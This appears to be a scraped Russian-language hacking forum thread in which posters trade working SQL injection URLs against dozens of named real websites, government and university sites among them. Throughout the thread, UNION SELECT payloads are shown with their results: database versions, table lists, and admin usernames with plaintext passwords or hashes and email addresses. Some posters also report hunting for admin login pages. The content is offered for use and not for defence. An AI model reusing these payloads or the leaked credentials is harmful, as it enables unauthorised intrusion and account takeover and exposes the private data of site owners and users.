PR: 4 http://www.migrationhistory.com/ma/index.php?section=members&id=1+union+select+1,concat_ws(0x3a,version(),user(),database())-- 4.0.18:[email protected]:migrationhistory
www.sh2all.com Code: http://www.sh2all.com/down.php?id=-1098+union+select+1,concat_ws(0x0b,version(),user(),database()),3,4,5 Версия - 5.0.67-community Юзер - sh2all_protect@localhost БД - sh2all_protect Табличка юзеры: Code: http://www.sh2all.com/down.php?id=-1098+union+select+1,concat_ws(0x0b,id,username,passhash,email),3,4,5+from+users Code: Ник - admin Хэш - e8438e60f23ca196598c540d2e5b6d4b Мыло - [email protected] Табличка админ: Code: http://www.sh2all.com/down.php?id=-1098+union+select+1,group_concat(0x0b,username,password),3,4,5+from+admin Code: locus:15963 admin:password Админка Code: http://www.sh2all.com/admin.php?act=login
Code: http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+version(),2,3 Code: http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+username,2,3+from+cfaq_admin_crm Code: http://www.keichanyaki.com/archive/index.php?catid=22&qid=-2+UnIoN+SeLEcT+password,2,3+from+cfaq_admin_crm только, почему то ошибка..
мой 100-ый пост хДДД http://www.akl-ma.net/members/success_stories/showdetials.php?id=1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9-- 4.1.22-standard:aklmanet_akluser@localhost:aklmanet_akl
http://www.latindex.unam.mx/larga.php?opcion=1&folio=9999999999+union+select+password+from+usuario+--+ PostgreSQL
PR: 3 http://hedgie.eu/ma/me/place/NHindex.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,3,14,15,16,17,18,19,20,21,22--&cal=2 4.1.22-standard:hedgius2_mamb1@localhost:hedgius2_mamb1 ############################################### http://www.ma-pa.org/content.php?ID=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6-- 5.0.32-Debian_7etch6:ma_pa_org@localhost:ma_pa_org ########################################### прикольная скуля ))))) смареть в пути картинки которая не открывается ))увидите http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+s elect+1,2,vers ion(),4,5-- http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+select+1,2,group_concat(table_name ),4,5+from+information_schem a.tables+group+by+table_s ema+ limit+1,1-- tables: home,about,receipt,file,wmv,page,distributer,shopping_type,mycalendar,bullet,relations_news,iv,account,reference,gallery,pictrue,download,system,news, clients,sendnews,member,article,reference_type,gallery_type,products,download_type,useronline,newsletter,comment,shopping,menu,banner,relations,guestbook,products_type,faq,users,od,contact, shopping_reserve,monetary,banner_menu,relations_article http://ma-hepub.com/gallery_lists.php?gallery_ID=3&id=-1+union+select+1,2,group_concat(concat_ws(0x3a,username,pa ssword)),4,5+ from+users -- users: grich:392607,admin:admin,test:test,9grich:1234,tom:tom,jeab:240600,PpP:74123698,Kathy:3316600,johnnybravo:113249223, champ29:29121984,jaxx1860:jaxx1860,beerkabpom:047003591,MAX:15621234,unicon13:379158,babydoy2526:123456789
ПР5 http://www.mainepolicy.org/news/show.php?news_id=-259+union+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14+from+users/*&category=1 Админку не нашёл((
http://glastonburytrust.co.uk/news_detail.php?pID=-8+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 Database Version: 5.0.67-community Database name: glastonb_db User name: glastonb_db@localhost In database glastonb_db found table users 1 : name 2 : email 3 : password 4 : status 5 : university
http://pi.aq-central.com/roster.php?id=1+union+select+version()-- 5.0.75-community-log http://pi.aq-central.com/roster.php?id=1+union+select+group_concat(concat_ws (0x3a,usernam e,pass word))+from+use rs-- admin:admin,superJAYdude:baconbits1,Jason A. Churchill:888888,PositivePaul:FreeGeorgeSherrill,Marlin Man:Safari,DAMellen:dirtysocks ############################################## PR 4 http://www.zeva.com.au/registry.php?id=-1'+u nion+select+1,2,3,4,5,versio n(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33+--+ 5.0.67 http://www.zeva.com.au/registry.php?id=-1'+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+information_schema.tables+group+by+table_schema+limit+4,1+--+ через лимиты берем таблы
http://www.strawtec.com.au/content.php?id=-5+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12+from+users+--+&ch=FAQ strawtecadmin:snowfall88 P.S. админка есть но пас не подходит(( http://www.austraumaconference.org/content.php?id=-2'+union+select+1,2,3,4,5,version()+--+ 4.1.22
http://www.vnrhcs.org/news_detail.php?id=26+UNION+SELECT+1,2,3,4,5,6,7,8,9+limit+1,1/* Database Version: 4.1.14-standard Database name: vnr User name: [email protected]
http://www.atriumtower.com/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5-- 1 4.0.27 2
http://www.ukurier.gov.ua/index.php?p=-4+union+select+1,concat_ws(0x3a,login,password),3+from+users+limit+31,1&id=4 olgas:5b708c065dfab38528050a84d852bf13 pass : 10610
http://bender.samaratoday.ru/webpage.php?id=6+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),Database(),User()),0x71),0x71)+LIMIT+1,1/* Database Version: 5.0.45-log Database name: samaratoda_ben User name: samaratoda_ben@localhost
PR5 http://www.aica-italia.it/interna.php?idsez=-13+union+select+1,2,3,4,version(),6,7,8-- 5.0.68-log http://www.aica-italia.it/interna.php?idsez=-13+union+select+1,2,3,4,concat_ws(char(58),nome_utente,password),6,7,8+from+amministrazione-- ilias:4ea4bb924a73da2829c38c88b45eb85a maria:b8fb37612c3cda3e341e12386a279b49 roberto:c6cc8094c2dc07b700ffcc36d64e2138 Не нашел админки(
Mysgl http://nouvelivoire.com/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11-- 3 5.0.67-community http://diangemilang.com/news/berita.php?view=detail&id=-28+union+select+1,version(),3,4,5,6,7,8,9,10,11-- 3 5.0.32-Debian_7etch3~bpo31+1-log -------------------------------------------------------------------------------- 10 WIB 5
IP network test & monitoring solutions PR 3 http://www.shenick.com/show_news.php?id=-87+union+select+1,user(),database(),version(),5,6,7,8,9+from+user+limit+0,1+-- vesrion() - 5.0.45-log PASS - 68faf6fe5f3d85c6 mysql hash Login - выяснить не удалось //какой-то частичный досутп к information_schema...
PHP: http://www.digitalfunnies.com/item.php?item_no=-17+union+select+1,2,3,cast(concat_ws(0x3a,version(),database(),user())+as+binary),5,6,7,8,9,10-- 4.1.16-standard-log:comicscans:[email protected] ================== PHP: http://www.kupi-jeftinije.com/item.php?id=-266+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9-- 4.1.22-standard-log:kupijeft_kupi:kupijeft_kupi@localhost
http://www.vats.gov.gh/newsdetails.php?ID=-20+union+select+1,username,password,4,5,6+from+users+limit+0,1+-- montero -business - [email protected] kwamedankyi -hello2day - [email protected] оба амдины. Админки не найдено.... PR 5
